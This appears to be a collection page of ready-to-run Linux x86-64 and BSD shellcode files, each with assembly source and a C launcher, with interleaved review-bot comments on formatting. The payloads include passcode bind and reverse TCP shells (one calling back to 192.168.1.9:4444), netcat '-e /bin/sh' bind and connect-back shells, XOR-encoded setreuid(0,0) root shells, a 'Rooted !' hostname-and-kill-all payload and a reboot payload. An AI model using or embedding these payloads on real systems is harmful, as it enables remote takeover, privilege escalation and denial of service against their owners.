jnz dup2_loop ; jump if not 0
;read buffer
mov rdi, rax ; socket
;xor rax, rax
cdq
mov byte [rsp-1], al ;0 read
sub rsp, 1
push rdx
lea rsi, [rsp-0x10] ; 16 bytes from buf
add dl, 0x10 ; size_t count
syscall
;test passcode
mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
push rdi ; save the socket
lea rdi, [rsi] ; load string from address
scasq ; compare
jz accepted_passwd ; jump if equal
;exit if different :P
push byte 0x3c
pop rax
syscall
accepted_passwd:
;execve
pop rdi; socket
xor rax, rax
mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
push rbx
mov rdi, rsp
push rax
mov rdx, rsp
push rdi
mov rsi, rsp
add al, 0x3b
syscall
*/
#include <stdio.h>
#include <string.h>
// 138 bytes
unsigned char code[] =\
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05"
"\x48\x97\xc7\x44\x24\xfc"
"\xc0\xa8\x01\x09\x66\xc7\x44\x24\xfa"
"\x11\x5c" //port big endiant
"\xc6\x44\x24\xf8\x02\x48\x83"
"\xec\x08\x6a\x2a\x58\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05"
"\x75\xf6\x48\x89\xc7\x99\x88\x44\x24\xff\x48\x83"
"\xec\x01\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f"
"\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57"
"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05"
"\x5f\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
"\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48"
"\x89\xe6\x04\x3b\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
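Review bot: The connect target is labelled only `; ip` on the `mov dword [rsp-4], 0x0901a8c0` line and has no comment on the `"\xc0\xa8\x01\x09..."` line of `code[]`, although the port next to it is annotated. Those four bytes are 192.168.1.9 in network byte order. I would write `; ip 192.168.1.9 (network byte order)` in the listing and `// 192.168.1.9` on the array line, so the address and port 4444 can be read off as indicators without decoding. The harness also declares `main()` with no return type, which C99 and later do not accept; `int main(void)` is the conforming form. The same applies to the `main()` in the next two files on this page.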


@ -0,0 +1,134 @@
/*
;Author - Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322
;175 bytes
;http://www.doomedraven.com/2014/05/slaex64-shellbindtcp-with-passcode.html
global _start
section .text
_start:
push byte 0x29 ; 41 - socket syscall
pop rax
push byte 0x02 ; AF_INET
pop rdi
push byte 0x01 ; SOCK_STREAM
pop rsi
cdq
syscall
;copy socket descriptor to rdi for future use
;bind
xchg rdi, rax
xor rax, rax
mov dword [rsp-4], eax ;INADDR_ANY
mov word [rsp-6], 0x5c11 ;PORT 4444
mov byte [rsp-8], 0x2 ;AF_INET
sub rsp, 0x8
push byte 0x31 ;49 bind
pop rax
mov rsi, rsp
cdq
add dl, 16 ;len
syscall
;listen
push byte 0x32 ;listen
pop rax
;push byte 0x02 ;max clients
;pop rsi
syscall
push byte 0x2b ; accept
pop rax
sub rsp, 0x10 ; adjust
xor rsi, rsi
mov rsi, rsp ; pointer
mov byte [rsp-1], 0x10 ;len
sub rsp, 0x01 ; adjust
cdq
mov rdx, rsp ; pointer
syscall
;read buffer
mov rdi, rax ; socket
xor rax, rax
mov byte [rsp-1], al ;0 read
sub rsp, 1
cdq
push rdx ; 0 stdin
lea rsi, [rsp-0x10] ; 16 bytes from buffer
add dl, 0x10 ; len
syscall
;test passcode
mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
push rdi ; save the socket
lea rdi, [rsi] ; load string from address
scasq ; compare
jz accepted_passwd ; jump if equal
;exit if different :P
xor rax, rax
add al, 60
syscall
accepted_passwd:
pop rdi; socket
push byte 0x03
pop rsi
dup2_loop:
dec rsi
push byte 0x21
pop rax
syscall
jnz dup2_loop ; jump if not 0
push rsi; 0
;execve
;push /bin//sh in reverse
mov rbx, 0x68732f2f6e69622f
push rbx
mov rdi, rsp
push rsi
mov rdx, rsp
push rdi
mov rsi, rsp
push byte 0x3b
pop rax
syscall
*/
#include <stdio.h>
#include <string.h>
// 175 bytes
unsigned char code[] =\
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05"
"\x48\x97\x48\x31\xc0\x89\x44\x24\xfc\x66\xc7\x44"
"\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec"
"\x08\x6a\x31\x58\x48\x89\xe6\x99\x80\xc2\x10\x0f"
"\x05\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x48\x83\xec"
"\x10\x48\x31\xf6\x48\x89\xe6\xc6\x44\x24\xff\x10"
"\x48\x83\xec\x01\x99\x48\x89\xe2\x0f\x05\x48\x89"
"\xc7\x48\x31\xc0\x88\x44\x24\xff\x48\x83\xec\x01"
"\x99\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f\x05"
"\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57\x48"
"\x8d\x3e\x48\xaf\x74\x07\x48\x31\xc0\x04\x3c\x0f"
"\x05\x5f\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f"
"\x05\x75\xf6\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
"\x73\x68\x53\x48\x89\xe7\x56\x48\x89\xe2\x57\x48"
"\x89\xe6\x6a\x3b\x58\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}


@ -0,0 +1,77 @@
/*
Shell Bind TCP Random Port Shellcode - C Language - Linux/x86_64
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
*/
/*
shell_bind_tcp_random_port_shellcode_x86_64
assembly source: https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm
* 57 bytes
* null-free
# gcc -m64 -fno-stack-protector -z execstack shell_bind_tcp_random_port_shellcode_x86_64.c -o shell_bind_tcp_random_port_shellcode_x86_64
Testing
# ./shell_bind_tcp_random_port_shellcode_x86_64
# netstat -anp | grep shell
# nmap -sS 127.0.0.1 -p- (It's necessary to use the TCP SYN scan option [-sS]; thus avoids that nmap connects to the port open by shellcode)
# nc 127.0.0.1 port
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x48\x31\xf6\x48\xf7\xe6\xff\xc6\x6a\x02"
"\x5f\xb0\x29\x0f\x05\x52\x5e\x50\x5f\xb0"
"\x32\x0f\x05\xb0\x2b\x0f\x05\x57\x5e\x48"
"\x97\xff\xce\xb0\x21\x0f\x05\x75\xf8\x52"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68"
"\x57\x54\x5f\xb0\x3b\x0f\x05";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(code));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("mov $0xffffffffffffffff, %rax\n\t"
"mov %rax, %rbx\n\t"
"mov %rax, %rcx\n\t"
"mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t"
"mov %rax, %rdi\n\t"
"mov %rax, %rbp\n\t"
// Calling the shellcode
"call code");
}
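Review bot: The `printf` call in `main` passes the `size_t` result of `strlen` to a `%d` conversion, which is a format/argument mismatch and undefined behaviour on an LP64 target. `code` is also `unsigned char[]`, while `strlen` takes `const char *`. I would write `printf("Shellcode Length: %zu\n", strlen((const char *)code));`, or cast the result to `int` as the other harnesses on this page do.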


@ -0,0 +1,112 @@
/*
Title : tcpbindshell (150 bytes)
Date : 04 October 2013
Author : Russell Willis <codinguy@gmail.com>
Testd on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux)
$ objdump -D tcpbindshell -M intel
tcpbindshell: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 ff xor rdi,rdi
400086: 48 31 f6 xor rsi,rsi
400089: 48 31 d2 xor rdx,rdx
40008c: 4d 31 c0 xor r8,r8
40008f: 6a 02 push 0x2
400091: 5f pop rdi
400092: 6a 01 push 0x1
400094: 5e pop rsi
400095: 6a 06 push 0x6
400097: 5a pop rdx
400098: 6a 29 push 0x29
40009a: 58 pop rax
40009b: 0f 05 syscall
40009d: 49 89 c0 mov r8,rax
4000a0: 4d 31 d2 xor r10,r10
4000a3: 41 52 push r10
4000a5: 41 52 push r10
4000a7: c6 04 24 02 mov BYTE PTR [rsp],0x2
4000ab: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a
4000b2: 48 89 e6 mov rsi,rsp
4000b5: 41 50 push r8
4000b7: 5f pop rdi
4000b8: 6a 10 push 0x10
4000ba: 5a pop rdx
4000bb: 6a 31 push 0x31
4000bd: 58 pop rax
4000be: 0f 05 syscall
4000c0: 41 50 push r8
4000c2: 5f pop rdi
4000c3: 6a 01 push 0x1
4000c5: 5e pop rsi
4000c6: 6a 32 push 0x32
4000c8: 58 pop rax
4000c9: 0f 05 syscall
4000cb: 48 89 e6 mov rsi,rsp
4000ce: 48 31 c9 xor rcx,rcx
4000d1: b1 10 mov cl,0x10
4000d3: 51 push rcx
4000d4: 48 89 e2 mov rdx,rsp
4000d7: 41 50 push r8
4000d9: 5f pop rdi
4000da: 6a 2b push 0x2b
4000dc: 58 pop rax
4000dd: 0f 05 syscall
4000df: 59 pop rcx
4000e0: 4d 31 c9 xor r9,r9
4000e3: 49 89 c1 mov r9,rax
4000e6: 4c 89 cf mov rdi,r9
4000e9: 48 31 f6 xor rsi,rsi
4000ec: 6a 03 push 0x3
4000ee: 5e pop rsi
00000000004000ef <doop>:
4000ef: 48 ff ce dec rsi
4000f2: 6a 21 push 0x21
4000f4: 58 pop rax
4000f5: 0f 05 syscall
4000f7: 75 f6 jne 4000ef <doop>
4000f9: 48 31 ff xor rdi,rdi
4000fc: 57 push rdi
4000fd: 57 push rdi
4000fe: 5e pop rsi
4000ff: 5a pop rdx
400100: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f
400107: 2f 73 68
40010a: 48 c1 ef 08 shr rdi,0x8
40010e: 57 push rdi
40010f: 54 push rsp
400110: 5f pop rdi
400111: 6a 3b push 0x3b
400113: 58 pop rax
400114: 0f 05 syscall
Code not is not optimal, this is left as an exercise to the reader ;^)
*/
#include <stdio.h>
#define PORT "\x7a\x69" /* 31337 */
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
"\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02"
PORT"\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05"
"\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31"
"\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59"
"\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48"
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
"\x5f\x6a\x3b\x58\x0f\x05";
int
main(void)
{
printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
return 0;
}


@ -0,0 +1,92 @@
/*
Title : reversetcpbindshell (118 bytes)
Date : 04 October 2013
Author : Russell Willis <codinguy@gmail.com>
Testd on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux)
$ objdump -D reversetcpbindshell -M intel
reversetcpbindshell: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 ff xor rdi,rdi
400086: 48 31 f6 xor rsi,rsi
400089: 48 31 d2 xor rdx,rdx
40008c: 4d 31 c0 xor r8,r8
40008f: 6a 02 push 0x2
400091: 5f pop rdi
400092: 6a 01 push 0x1
400094: 5e pop rsi
400095: 6a 06 push 0x6
400097: 5a pop rdx
400098: 6a 29 push 0x29
40009a: 58 pop rax
40009b: 0f 05 syscall
40009d: 49 89 c0 mov r8,rax
4000a0: 48 31 f6 xor rsi,rsi
4000a3: 4d 31 d2 xor r10,r10
4000a6: 41 52 push r10
4000a8: c6 04 24 02 mov BYTE PTR [rsp],0x2
4000ac: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a
4000b3: c7 44 24 04 0a 33 35 mov DWORD PTR [rsp+0x4],0x435330a
4000ba: 04
4000bb: 48 89 e6 mov rsi,rsp
4000be: 6a 10 push 0x10
4000c0: 5a pop rdx
4000c1: 41 50 push r8
4000c3: 5f pop rdi
4000c4: 6a 2a push 0x2a
4000c6: 58 pop rax
4000c7: 0f 05 syscall
4000c9: 48 31 f6 xor rsi,rsi
4000cc: 6a 03 push 0x3
4000ce: 5e pop rsi
00000000004000cf <doop>:
4000cf: 48 ff ce dec rsi
4000d2: 6a 21 push 0x21
4000d4: 58 pop rax
4000d5: 0f 05 syscall
4000d7: 75 f6 jne 4000cf <doop>
4000d9: 48 31 ff xor rdi,rdi
4000dc: 57 push rdi
4000dd: 57 push rdi
4000de: 5e pop rsi
4000df: 5a pop rdx
4000e0: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f
4000e7: 2f 73 68
4000ea: 48 c1 ef 08 shr rdi,0x8
4000ee: 57 push rdi
4000ef: 54 push rsp
4000f0: 5f pop rdi
4000f1: 6a 3b push 0x3b
4000f3: 58 pop rax
4000f4: 0f 05 syscall
Code not is not optimal, this is left as an exercise to the reader ;^)
*/
#include <stdio.h>
#define IPADDR "\xc0\x80\x10\x0a" /* 192.168.1.10 */
#define PORT "\x7a\x69" /* 31337 */
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24"
"\x02"PORT"\xc7\x44\x24\x04"IPADDR"\x48\x89\xe6\x6a\x10"
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
"\x5f\x6a\x3b\x58\x0f\x05";
int
main(void)
{
printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
return 0;
}
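Review bot: The `IPADDR` macro and its comment disagree: `"\xc0\x80\x10\x0a"` is 192.128.16.10, while the comment says 192.168.1.10, which would be `"\xc0\xa8\x01\x0a"`. The objdump listing in the header shows a third value, `mov DWORD PTR [rsp+0x4],0x435330a`, whose bytes `0a 33 35 04` are 10.51.53.4. It therefore looks like the disassembly was taken from a different build than the array. Anyone reading the connect target from the comment gets the wrong address. Either the bytes or the comment should be corrected so they match, and the header should say that the listing's address differs from the macro.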


@ -0,0 +1,64 @@
; { Title: Shellcode linux/x86-64 bind-shell with netcat }
; Author : Gaussillusion
; Len : 131 bytes
; Language : Nasm
BITS 64
xor rdx,rdx
mov rdi,0x636e2f6e69622fff
shr rdi,0x08
push rdi
mov rdi,rsp
mov rcx,0x68732f6e69622fff
shr rcx,0x08
push rcx
mov rcx,rsp
mov rbx,0x652dffffffffffff
shr rbx,0x30
push rbx
mov rbx,rsp
mov r10,0x37333331ffffffff
shr r10,0x20
push r10
mov r10,rsp
mov r9,0x702dffffffffffff
shr r9,0x30
push r9
mov r9,rsp
mov r8,0x6c2dffffffffffff
shr r8,0x30
push r8
mov r8,rsp
push rdx ;push NULL
push rcx ;push address of 'bin/sh'
push rbx ;push address of '-e'
push r10 ;push address of '1337'
push r9 ;push address of '-p'
push r8 ;push address of '-l'
push rdi ;push address of '/bin/nc'
mov rsi,rsp
mov al,59
syscall
; _bytecode_start_
;\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63
;\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62
;\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51\x48\x89\xe1
;\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb
;\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33
;\x33\x37\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\x49\xb9
;\xff\xff\xff\xff\xff\xff\x2d\x70\x49\xc1\xe9\x30\x41
;\x51\x49\x89\xe1\x49\xb8\xff\xff\xff\xff\xff\xff\x2d
;\x6c\x49\xc1\xe8\x30\x41\x50\x49\x89\xe0\x52\x51\x53
;\x41\x52\x41\x51\x41\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
; _bytecode_end_
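Review bot: The header gives title, author and length but not the command the code ends up executing, whereas the connect-back listing by the same author further down this page has a `;syscall:` line. Reading the pushes in order, the argv built here is `/bin/nc -l -p 1337 -e /bin/sh` with a NULL envp. I would add `;syscall: execve("/bin/nc",{"/bin/nc","-l","-p","1337","-e","/bin/sh"},NULL)` under the `Language` line. That is the command line that process-creation telemetry would record. The `;push address of 'bin/sh'` comment also drops the leading slash.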


@ -0,0 +1,62 @@
; { Title: Shellcode linux/x86-64 connect back shell }
; Author : Gaussillusion
; Len : 109 bytes
; Language : Nasm
;syscall: execve("/bin/nc",{"/bin/nc","ip","1337","-e","/bin/sh"},NULL)
BITS 64
xor rdx,rdx
mov rdi,0x636e2f6e69622fff
shr rdi,0x08
push rdi
mov rdi,rsp
mov rcx,0x68732f6e69622fff
shr rcx,0x08
push rcx
mov rcx,rsp
mov rbx,0x652dffffffffffff
shr rbx,0x30
push rbx
mov rbx,rsp
mov r10,0x37333331ffffffff
shr r10,0x20
push r10
mov r10,rsp
jmp short ip
continue:
pop r9
push rdx ;push NULL
push rcx ;push address of 'bin/sh'
push rbx ;push address of '-e'
push r10 ;push address of '1337'
push r9 ;push address of 'ip'
push rdi ;push address of '/bin/nc'
mov rsi,rsp
mov al,59
syscall
ip:
call continue
db "127.0.0.1"
;______________________bytecode_______________________
;\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63
;\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62
;\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51\x48\x89\xe1
;\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb
;\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33
;\x33\x37\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\xeb\x11
;\x41\x59\x52\x51\x53\x41\x52\x41\x51\x57\x48\x89\xe6
;\xb0\x3b\x0f\x05\xe8\xea\xff\xff\xff\x31\x32\x37\x2e
;\x30\x2e\x30\x2e\x31
;______________________bytecode_______________________


@ -0,0 +1,14 @@
# Title: Linux x86-64 setreuid (0,0) & execve("/bin/ash",NULL,NULL) + XOR encoded - 85 bytes
# Author: egeektronic <info (at) egeektronic {dot} com>
# Twitter: @egeektronic
# Tested on: Slackware 13.37
# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer
unsigned char shellcode[] =
"\x4d\x31\xc0\x41\xb1\x7f\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x37\x4e\xbf\x37\xfc\xbf"
"\x0e\x37\x4e\x80\x37\x4e\x89\x70\x7a\x94\x6f\x37\x4e\xbf\x37"
"\xfc\xbf\x44\x20\x37\x4e\x89\x37\x4e\xad\x70\x7a\x97\x94\x80"
"\x80\x80\x50\x1d\x16\x11\x50\x1e\x0c\x17";
int main(void) { ((void (*)())shellcode)(); }
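Review bot: The five header lines start with `#`, but the rest of the file is C. If this is meant to be compiled, the preprocessor will read `# Title:` and the lines after it as directives and reject them. Wrapping the header in `/* ... */` keeps the metadata and makes the file valid C. The same header style appears in the csh, ksh and zsh variants that follow and in the sethostname file after them. Because the payload after the decoder stub is XOR-encoded, the header is the only statement of what it does, so it is worth keeping intact and readable.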


@ -0,0 +1,14 @@
# Title: Linux x86-64 setreuid (0,0) & execve("/bin/csh", ["/bin/csh", NULL]) + XOR encoded - 87 bytes
# Author: egeektronic <info (at) egeektronic {dot} com>
# Twitter: @egeektronic
# Tested on: Slackware 13.37
# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer
unsigned char shellcode[] =
"\x4d\x31\xc0\x41\xb1\xe3\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\xab\xd2\x23\xab\x60\x23"
"\x92\xab\xd2\x1c\xab\xd2\x15\xec\xe6\x08\xf1\xab\xd2\x23\xab"
"\x60\x23\xd8\xbc\xab\xd2\x31\xb1\xb4\xab\x6a\x05\xec\xe6\x0b"
"\x0a\x1c\x1c\x1c\xcc\x81\x8a\x8d\xcc\x80\x90\x8b";
int main(void) { ((void (*)())shellcode)(); }


@ -0,0 +1,14 @@
# Title: Linux x86-64 setreuid (0,0) & execve("/bin/ksh", ["/bin/ksh", NULL]) + XOR encoded - 87 bytes
# Author: egeektronic <info (at) egeektronic {dot} com>
# Twitter: @egeektronic
# Tested on: Slackware 13.37
# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer
unsigned char shellcode[] =
"\x4d\x31\xc0\x41\xb1\x17\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x5f\x26\xd7\x5f\x94\xd7"
"\x66\x5f\x26\xe8\x5f\x26\xe1\x18\x12\xfc\x05\x5f\x26\xd7\x5f"
"\x94\xd7\x2c\x48\x5f\x26\xc5\x45\x40\x5f\x9e\xf1\x18\x12\xff"
"\xfe\xe8\xe8\xe8\x38\x75\x7e\x79\x38\x7c\x64\x7f";
int main(void) { ((void (*)())shellcode)(); }


@ -0,0 +1,14 @@
# Title: Linux x86-64 setreuid (0,0) & execve("/bin/zsh", ["/bin/zsh", NULL]) + XOR encoded - 87 bytes
# Author: egeektronic <info (at) egeektronic {dot} com>
# Twitter: @egeektronic
# Tested on: Slackware 13.37
# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer
unsigned char shellcode[] =
"\x4d\x31\xc0\x41\xb1\x3c\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x74\x0d\xfc\x74\xbf\xfc"
"\x4d\x74\x0d\xc3\x74\x0d\xca\x33\x39\xd7\x2e\x74\x0d\xfc\x74"
"\xbf\xfc\x07\x63\x74\x0d\xee\x6e\x6b\x74\xb5\xda\x33\x39\xd4"
"\xd5\xc3\xc3\xc3\x13\x5e\x55\x52\x13\x46\x4f\x54";
int main(void) { ((void (*)())shellcode)(); }


@ -0,0 +1,43 @@
# Linux/x86_64 sethostname() & killall 33 bytes shellcode
# Date: 2010-04-26
# Author: zbt
# Tested on: x86_64 Debian GNU/Linux
/*
; sethostname("Rooted !");
; kill(-1, SIGKILL);
section .text
global _start
_start:
;-- setHostName("Rooted !"); 22 bytes --;
mov al, 0xaa
mov r8, 'Rooted !'
push r8
mov rdi, rsp
mov sil, 0x8
syscall
;-- kill(-1, SIGKILL); 11 bytes --;
push byte 0x3e
pop rax
push byte 0xff
pop rdi
push byte 0x9
pop rsi
syscall
*/
int main(void)
{
char shellcode[] =
"\xb0\xaa\x49\xb8\x52\x6f\x6f\x74\x65\x64\x20\x21\x41\x50\x48\x89"
"\xe7\x40\xb6\x08\x0f\x05\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05";
(*(void (*)()) shellcode)();
return 0;
}


@ -0,0 +1,18 @@
// ----------bsd/x86 reboot() shellcode-----------------
// AUTHOR : beosroot
// INFO : OpenBSD x86 reboot() shellcode
// EMAIL : beosroot@null.net
// beosroot@hotmail.fr
char shellcode[] = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80";
int main() {
int *ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
// the end o.O